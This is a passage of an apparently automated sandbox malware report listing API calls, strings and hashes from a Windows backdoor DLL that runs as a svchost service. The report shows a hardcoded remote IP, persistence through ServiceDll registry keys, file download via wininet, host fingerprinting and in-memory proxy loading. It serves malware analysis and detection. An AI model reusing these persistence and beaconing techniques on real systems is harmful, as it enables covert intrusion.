                                                                                          • API String ID: 2887716753-2040270271
                                                                                          • Opcode ID: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                          • Instruction ID: 8d4d7167a0abf61afb389703d9ccc16411aa1da686c4766c6b67e9c280f51853
                                                                                          • Opcode Fuzzy Hash: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                          • Instruction Fuzzy Hash: DD2148B1D04218BAEB01EBF58C48FEFBFB8EF48391F114465E605E2144DB759A448BA0

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                          • CreateFileA.KERNEL32(10002CDC,40000000,00000000,00000000,00000002,00000000,00000000,?,00000001,00000000), ref: 100045B7
                                                                                          • memset.MSVCRT ref: 100045D3
                                                                                          • GetProcAddress.KERNEL32(10002CDC,InternetReadFile), ref: 100045E3
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 1000461B
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 1000462E
                                                                                          • Sleep.KERNEL32(00000001,?,00000001,00000000), ref: 10004639
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10004645
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 10004658
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                                          • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
                                                                                          • API String ID: 2364563185-3604101231
                                                                                          • Opcode ID: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                          • Instruction ID: cfdd7e431f84bb68211a12104eaec753c658bf1fa5ec063c49e3443a626c7788
                                                                                          • Opcode Fuzzy Hash: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                          • Instruction Fuzzy Hash: 0E3149B180011CBEEB109FA0CC84EEFBFB9EB483D5F118069F605A2154DB365E858AA5

                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10002DA3
                                                                                          • wsprintfA.USER32 ref: 10002DD0
                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10002DE4
                                                                                          • GetLastError.KERNEL32 ref: 10002DF0
                                                                                          • ReleaseMutex.KERNEL32(00000000), ref: 10002DFE
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10002E05
                                                                                          • rand.MSVCRT ref: 10002E28
                                                                                          • Sleep.KERNEL32 ref: 10002E37
                                                                                          • lstrcatA.KERNEL32(00000000,103.36.221.195), ref: 10002E60
                                                                                          • strcmp.MSVCRT ref: 10002E72
                                                                                          • GetTickCount.KERNEL32 ref: 10002E8A
                                                                                          • GetTickCount.KERNEL32 ref: 10002EA6
                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,00002256), ref: 10002F0F
                                                                                          • Sleep.KERNEL32(000001F4), ref: 10002F1C
                                                                                          Similarity
                                                                                          • API ID: CountMutexSleepTick$CloseCreateErrorH_prologHandleLastObjectReleaseSingleWaitlstrcatrandstrcmpwsprintf
                                                                                          • String ID: %s:%d:%s$103.36.221.195$encvbk
                                                                                          • API String ID: 4065721159-1904885736
                                                                                          • Opcode ID: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                          • Instruction ID: 0aef3fa4da984b37d72cd036fbc76a84f9d8f20caef5abb9300e459f48f97b0e
                                                                                          • Opcode Fuzzy Hash: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                          • Instruction Fuzzy Hash: 4F41A8358042A5ABFB15DBB4CC88BDE7BB9EF093C0F1040A5E509E3199DF716A44CB51

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                          • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                          • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                          • API String ID: 2449869053-3188892968
                                                                                          • Opcode ID: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                          • Instruction ID: 2058804bda021c861d2603192b8c2d3dc199326d0aa42d29f4cfa0892e9c0375
                                                                                          • Opcode Fuzzy Hash: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                          • Instruction Fuzzy Hash: E741E3B1900259BFFF11DF94DC84EEEBAB9FB08695F114026FA24A2168DB318C159B64

                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10001608
                                                                                          • memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                          • memcpy.MSVCRT(00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 1000169E
                                                                                          • memcmp.MSVCRT(00000003,00000003,00000003,00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016AD
                                                                                          • _CxxThrowException.MSVCRT(?,10005370), ref: 100016C9
                                                                                          • memcpy.MSVCRT(?,00000000,00000004,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016E1
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001743
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 1000174F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017A7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017B0
                                                                                          • _CxxThrowException.MSVCRT(?,10005370), ref: 100017CD
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017DC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017EA
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          Similarity
                                                                                          • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                                          • String ID: P`$``
                                                                                          • API String ID: 1493374972-3525061398
                                                                                          • Opcode ID: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                          • Instruction ID: 8fe5d1832865b8ccca8e0fc317077c96d8ecfcaf39360939d2f87a7bcfb0ed6c
                                                                                          • Opcode Fuzzy Hash: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                          • Instruction Fuzzy Hash: 1E51B4B5A00109ABFF44DFA4CD82EEEB7BAFF48680F004019F605A7185DF75AA50CB95

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                          • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                          • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                          • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032E3
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032ED
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$FreeLoad
                                                                                          • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                                          • API String ID: 2256533930-3340630095
                                                                                          • Opcode ID: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                          • Instruction ID: 1885695b6b8551886770f00f979ae30a25f1f1d427a69892d216d7985a67bda5
                                                                                          • Opcode Fuzzy Hash: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                          • Instruction Fuzzy Hash: 1641EA70A00219AFEB01DBA5CC88DEFBBBDFF89795B208459F505E7258D7719901CBA0

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000439A
                                                                                          • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 100043AD
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 100043B8
                                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 100043C3
                                                                                          • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100043D1
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100043DB
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 100043E6
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                                                                          • API String ID: 2238633743-588083535
                                                                                          • Opcode ID: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                          • Instruction ID: 67ebd5df9d46fa76e82372fdf0c3b5a8e4a25dc64441a3b0318b74b919e85c2a
                                                                                          • Opcode Fuzzy Hash: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                          • Instruction Fuzzy Hash: 212107B1D00228BBEB10EFA5DC44BEEBAFDEB48391F114126F911F2254DB7459408F64
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 100036D4
                                                                                          • wsprintfA.USER32 ref: 100036F4
                                                                                          • lstrlenA.KERNEL32(?,00000000), ref: 10003706
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • memset.MSVCRT ref: 10003738
                                                                                          • getsockname.WS2_32(?,?,?), ref: 10003751
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 10003764
                                                                                            • Part of subcall function 100035EA: lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                            • Part of subcall function 100035EA: gethostname.WS2_32(?,?), ref: 10003621
                                                                                          • GetVersionExA.KERNEL32(?), ref: 10003792
                                                                                            • Part of subcall function 1000358C: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                            • Part of subcall function 1000358C: wsprintfA.USER32 ref: 100035DE
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 100037B0
                                                                                            • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                            • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                            • Part of subcall function 1000366A: LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                            • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                            • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                            • Part of subcall function 1000366A: FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                            • Part of subcall function 10003629: lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                            • Part of subcall function 10003629: lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                          • lstrcpyA.KERNEL32(?,10006514), ref: 10003809
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$memset$Load$lstrlenmemcpy$??2@??3@Freelstrcpywsprintf$GlobalInfoMemoryStatusSystemVersiongethostnamegetsockname
                                                                                          • String ID: @$Group$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          • API String ID: 1875266911-2108995110
                                                                                          • Opcode ID: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                          • Instruction ID: 3133a6343b416fd9d4de8abc7d75c938e5c6614370202d51db2fcbf0203c4673
                                                                                          • Opcode Fuzzy Hash: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                          • Instruction Fuzzy Hash: 2C41FDB690121CAAEB10DBA4CC49FCEB7BCEB08340F104496F609E7195DB74AB448FA1
                                                                                          APIs
                                                                                          • printf.MSVCRT ref: 100024B8
                                                                                          • printf.MSVCRT ref: 100024C9
                                                                                          • memset.MSVCRT ref: 100024FC
                                                                                          • memcpy.MSVCRT(10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 10002505
                                                                                          • ??2@YAPAXI@Z.MSVCRT(-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000250E
                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000251B
                                                                                          • printf.MSVCRT ref: 10002537
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002561
                                                                                          • printf.MSVCRT ref: 10002573
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: printf$memcpy$??2@??3@memset
                                                                                          • String ID: Can't load library from memory.$Loop_Proxy$OpenProxy$hmProxy!= NULL
                                                                                          • API String ID: 60333908-620223428
                                                                                          • Opcode ID: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                          • Instruction ID: 34426b20c795a1564e6a7497d8f5fa3a22278249d6d1bd148d0ebd3529ec88d4
                                                                                          • Opcode Fuzzy Hash: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                          • Instruction Fuzzy Hash: 07112B76A045247FF200E7B0AD45FAF339ECB087D6F210026FA009605EEE756D0043A9
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10001E3C
                                                                                          • wsprintfA.USER32 ref: 10001E7B
                                                                                            • Part of subcall function 10001B5B: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                            • Part of subcall function 10001B5B: _local_unwind2.MSVCRT ref: 10001BA9
                                                                                          • wsprintfA.USER32 ref: 10001EAE
                                                                                          • strlen.MSVCRT ref: 10001EBB
                                                                                            • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                            • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          • memset.MSVCRT ref: 10001EEE
                                                                                          • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost), ref: 10001F02
                                                                                          • lstrlenA.KERNEL32(?,00000001), ref: 10001F0B
                                                                                            • Part of subcall function 10001A43: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,encvbk,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A54
                                                                                            • Part of subcall function 10001A43: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A69
                                                                                            • Part of subcall function 10001A43: StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A7A
                                                                                            • Part of subcall function 10001A43: GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A84
                                                                                            • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A92
                                                                                            • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AC2
                                                                                          Strings
                                                                                          • ServiceDll, xrefs: 10001ED2
                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001EFC
                                                                                          • %%SystemRoot%%\System32\svchost.exe -k "%s", xrefs: 10001E6F
                                                                                          • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10001EA8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Service$Open$CloseHandleLibraryManagerwsprintf$ErrorFreeH_prologLastLoadStart_local_unwind2lstrcpylstrlenmemsetstrlen
                                                                                          • String ID: %%SystemRoot%%\System32\svchost.exe -k "%s"$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                          • API String ID: 1573142492-3522277913
                                                                                          • Opcode ID: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                          • Instruction ID: b0e3a08bed4d5a752cfc5ae4754fd9917613b9386cafdbad90e7966b10716f67
                                                                                          • Opcode Fuzzy Hash: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                          • Instruction Fuzzy Hash: D9217EB290011CBBEB10DF94DC86EEF7B7DEB48780F104069FA08A2145EB715F558BA6
                                                                                          APIs
                                                                                            • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                            • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                            • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                            • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                            • Part of subcall function 100020C8: GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                            • Part of subcall function 100020C8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                            • Part of subcall function 100020C8: GetTickCount.KERNEL32 ref: 100020F9
                                                                                            • Part of subcall function 100020C8: wsprintfA.USER32 ref: 10002113
                                                                                            • Part of subcall function 100020C8: MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                            • Part of subcall function 100020C8: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                          • wsprintfA.USER32 ref: 10002FC4
                                                                                          • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002FE7
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 10002FFF
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 1000300C
                                                                                          • GetLastError.KERNEL32 ref: 10003018
                                                                                          • Sleep.KERNEL32(000003E8), ref: 10003028
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 10003035
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileService$AttributesCloseHandleModuleMoveNameOpenQuerySleepStatuswsprintf$ControlCountCreateDirectoryErrorLastManagerProcessSystemTick
                                                                                          • String ID: D$GUpdate%s$WinSta0\Default$encvbk
                                                                                          • API String ID: 3185690247-1238469715
                                                                                          • Opcode ID: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                          • Instruction ID: ebf8a919204883b3cf295611002b4e487a781f5c3db184b4aeea1269bd5b3cbf
                                                                                          • Opcode Fuzzy Hash: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                          • Instruction Fuzzy Hash: EB11B672401269AFFB11DBA0CC45EDF37BEFF09381F204051F506E2098DBB49A088BA1
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10004750
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10004764
